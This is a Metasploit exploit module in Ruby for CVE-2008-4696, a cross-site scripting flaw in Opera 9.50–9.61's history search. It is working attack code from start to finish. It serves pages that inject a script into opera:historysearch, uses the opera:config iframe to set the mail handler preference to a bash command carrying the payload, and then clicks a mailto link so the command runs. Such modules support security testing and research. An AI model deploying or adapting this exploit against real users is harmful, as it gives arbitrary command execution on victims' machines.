1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpServer::HTML
10

11
  # include Msf::Exploit::Remote::BrowserAutopwn
12
  # autopwn_info({
13
  #  :ua_name    => HttpClients::OPERA,
14
  #  :javascript => true,
15
  #  :rank       => ExcellentRanking, # reliable command execution
16
  #  :vuln_test  => %Q{
17
  #    v = parseFloat(opera.version());
18
  #    if (9.5 < v && 9.62 > v) {
19
  #      is_vuln = true;
20
  #    }
21
  #  },
22
  # })
23

24
  def initialize(info = {})
25
    super(
26
      update_info(
27
        info,
28
        'Name' => 'Opera historysearch XSS',
29
        'Description' => %q{
30
          Certain constructs are not escaped correctly by Opera's History
31
          Search results.  These can be used to inject scripts into the
32
          page, which can then be used to modify configuration settings
33
          and execute arbitrary commands.  Affects Opera versions between
34
          9.50 and 9.61.
35
        },
36
        'License' => BSD_LICENSE,
37
        'Author' => [
38
          'Roberto Suggi', # Discovered the vulnerability
39
          'Aviv Raff <avivra[at]gmail.com>', # showed it to be exploitable for code exec
40
          'egypt', # msf module
41
        ],
42
        'References' => [
43
          ['CVE', '2008-4696'],
44
          ['OSVDB', '49472'],
45
          ['BID', '31869'],
46
          ['URL', 'http://www.opera.com/support/kb/view/903/'],
47
        ],
48
        'Payload' => {
49
          'EXITFUNC' => 'process',
50
          'Space' => 4000,
51
          'DisableNops' => true,
52
          'BadChars' => "\x09\x0a\x0d\x20",
53
          'Compat' =>
54
              {
55
                'PayloadType' => 'cmd',
56
                'RequiredCmd' => 'generic perl ruby telnet'
57
              }
58
        },
59
        'Targets' => [
60
          # [ 'Automatic', {  } ],
61
          # [ 'Opera < 9.61 Windows',
62
          #	{
63
          #		'Platform' => 'win',
64
          #		'Arch' => ARCH_X86,
65
          #	}
66
          # ],
67
          [
68
            'Opera < 9.61 Unix Cmd',
69
            {
70
              'Platform' => 'unix',
71
              'Arch' => ARCH_CMD
72
            }
73
          ],
74
        ],
75
        'DisclosureDate' => '2008-10-23', # Date of full-disclosure post showing code exec
76
        'DefaultTarget' => 0,
77
        'Notes' => {
78
          'Reliability' => UNKNOWN_RELIABILITY,
79
          'Stability' => UNKNOWN_STABILITY,
80
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
81
        }
82
      )
83
    )
84
  end
85

86
  def on_request_uri(cli, request)
87
    headers = {}
88
    html_hdr = %(
89
      <html>
90
      <head>
91
      <title>Loading</title>
92
      )
93
    html_ftr = %(
94
      </head>
95
      <body >
96
      <h1>Loading</h1>
97
      </body></html>
98
      )
99

100
    case request.uri
101
    when /[?]jspayload/
102
      p = regenerate_payload(cli)
103
      if (p.nil?)
104
        send_not_found(cli)
105
        return
106
      end
107
      # We're going to run this through unescape(), so make sure
108
      # everything is encoded
109
      penc = Rex::Text.to_hex(p.encoded, '%')
110
      content =
111
        %{
112
          var s = document.createElement("iframe");
113

114
          s.src="opera:config";
115
          s.id="config_window";
116
          document.body.appendChild(s);
117
          config_window.eval(
118
            "var cmd = unescape('/bin/bash -c %22#{penc}%22 ');" +
119
            "old_app = opera.getPreference('Mail','External Application');" +
120
            "old_handler = opera.getPreference('Mail','Handler');" +
121
            "opera.setPreference('Mail','External Application',cmd);" +
122
            "opera.setPreference('Mail','Handler','2');" +
123
            "app_link = document.createElement('a');" +
124
            "app_link.setAttribute('href', 'mailto:[email protected]');" +
125
            "app_link.click();" +
126
            "setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},0);" +
127
            "setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},0);" +
128
          "");
129
          setTimeout(function () {window.location='about:blank'},1);
130
        }
131

132
    when /[?]history/
133
      js = %^
134
        window.onload = function() {
135
          location.href = "opera:historysearch?q=*";
136
        }
137
        ^
138
      content = %(
139
        #{html_hdr}
140
        <script><!--
141
        #{js}
142
        //--></script>
143
        #{html_ftr}
144
        )
145
    when get_resource
146
      print_status("Sending #{name} for request #{request.uri}")
147

148
      js = %^
149
        if (window.opera) {
150
          var wnd = window;
151
          while (wnd.parent != wnd) {
152
            wnd = wnd.parent;
153
          }
154
          url = location.href;
155
          wnd.location = url + "?history#<script src='" + url +"?" + "jspayload=1'/><!--";
156
        }
157
        ^
158
      content = %(
159
        #{html_hdr}
160
        <script><!--
161
        #{js}
162
        //--></script>
163
        #{html_ftr}
164
        )
165
    else
166
      print_status("Sending 404 for request #{request.uri}")
167
      send_not_found(cli)
168
      return
169
    end
170
    content.gsub!(/^ {8}/, '')
171
    content.gsub!(/\t/, ' ')
172

173
    send_response_html(cli, content, headers)
174
    handler(cli)
175
  end
176
end
177

178